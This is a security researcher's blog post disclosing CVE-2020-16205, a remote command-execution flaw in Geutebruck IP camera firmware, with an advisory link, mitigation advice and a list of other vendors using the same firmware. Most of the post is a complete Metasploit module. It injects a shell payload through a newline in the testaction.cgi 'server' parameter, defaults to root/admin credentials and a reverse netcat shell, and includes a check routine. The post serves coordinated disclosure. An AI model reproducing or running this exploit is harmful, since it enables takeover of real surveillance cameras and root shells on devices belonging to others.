[s05e01] RCE on Geutebruck IP Cameras

By Davy Douhine | August 7, 2020

Abstract

Those who follow our blog know that we like Geutebruck cameras: we found many trivial RCE on their products since 2016.

A few months ago we found a new one. Those new attack vectors / vulnerabilites are affecting firmware versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5 of the following Encoder and E2 Series Camera models:

G-Code:

  • EEC-2xxx

G-Cam:

  • EBC-21xx
  • EFD-22xx
  • ETHC-22xx
  • EWPC-22xx

Like before we’ve choose to “responsible disclose” this 0day vulnerability directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware has been released (1.12.0.27) to fix that, ICS-CERT has released an advisory and one CVE (CVE-2020-16205) has been assigned.

Many thanks to Geutebruck and ICS-CERT teams.


Advisory

https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03


Exploit

This time we did a quick and dirty metasploit module with a check feature to check if your camera is vulnerable.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits a an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
        authenticated user to execute arbitrary commands with root privileges.
        with web user privileges. Firmware <= 1.12.14.5 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
      },
      'Author'         =>
        [
          'Davy Douhine'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2020-16205' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
        ],
      'DisclosureDate' => 'May 20 2020',
      'Privileged'     => true,
      'Platform'            => ['unix', 'linux'],
      'Arch'                => [ARCH_ARMLE],
      'Targets'              => [
        [ 'Automatic Target', { } ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions'      =>
       {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        }
      ))

    register_options(
      [
        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
      ], self.class)
  end

  def check
      begin
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml',
          'query' => "",
        )
        if res && res.body.include?("1.12.14.5")
          return CheckCode::Vulnerable
        end
      rescue ::Rex::ConnectionError
        return CheckCode::Unknown
      end
      CheckCode::Safe
    end

  def exploit
    user = datastore['HttpUsername']
    pass = datastore['HttpPassword']
    header = "type=ntp&server=%0a"
    uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_raw(
      {
        'method' => 'GET',
        'uri'    => uri
    })
  end

end


Mitigation

Geutebruck has released a new software version, Version 1.12.0.27, to address the identified vulnerability, which is available at the following location (registration needed):

http://www.geutebrueck.com/en_EN/login.html

If an update is not possible right now in between users can disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.


In the wild

Many brands use the same firmware (and are vulnerable too):

  • UDP Technology (which is also the supplier of the firmware for the other vendors)
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence
  • Sophus
  • VCA
  • TripCorps
  • Sprinx Technologies
  • Smartec
  • Riva